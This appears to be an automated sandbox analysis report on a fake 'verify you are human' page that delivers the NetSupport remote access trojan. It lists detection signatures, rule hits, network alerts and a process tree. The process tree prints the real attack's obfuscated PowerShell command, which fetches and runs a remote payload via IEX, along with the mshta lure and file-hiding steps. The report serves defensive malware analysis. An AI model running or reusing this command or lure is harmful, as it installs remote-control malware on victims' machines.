Windows
Analysis Report
https://tekascend.com/Ray-verify.html
Overview
Detection
NetSupport RAT
Score: 80 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
AI detected suspicious Javascript
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Classification
- System is w10x64_ra
- svchost.exe (PID: 6928, cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- chrome.exe (PID: 7032, cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank", MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6408, cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1980,i,1191412043750487662,6149508338053022804,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8, MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 4304, cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tekascend.com/Ray-verify.html", MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- mshta.exe (PID: 364, cmdline: "C:\Windows\system32\mshta.exe" https://tekascend.com/Ray-verify.html # ? ''Verify you are human - Ray Verification ID: 3855'', MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- powershell.exe (PID: 2912, cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='##(N##ew-O###bje###ct N###et.W###e'; $c4='b##Cl####ie##nt##).###D###ow#nl##o##'; $c3='a##dSt####ri#####n###g(''http://goaccredited.biz/o/o.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('#','');I`E`X $TC|I`E`X, MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3292, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 2420, cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns, MD5: 62F170FB07FDBB79CEB7147101406EB8)
- cmd.exe (PID: 2352, cmdline: "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\cwQzbS, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- attrib.exe (PID: 2408, cmdline: attrib +h C:\Users\user\AppData\Roaming\cwQzbS, MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
- cleanup
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
| JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
System Summary
Sigma rule authors: Michael Haag; Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); frack113, Nasreddine Bencherchali (Nextron Systems); Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); vburov
Remote Access Functionality
Rule author: Joe Security
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-20T19:17:31.426953+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:31.751272+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:33.093099+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:34.667195+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:34.991196+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:35.442452+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:35.761557+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:36.150382+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:36.676468+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49734 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:43.706371+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49736 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:44.506108+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49736 | 171.22.108.177 | 80 | TCP |
2024-12-20T19:17:45.584871+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49736 | 171.22.108.177 | 80 | TCP |
Phishing
Sources: Joe Sandbox AI (2 findings); HTTP Parser (5 findings); HTTPS traffic detected (15 findings)
Networking
Source: Image file has PE prefix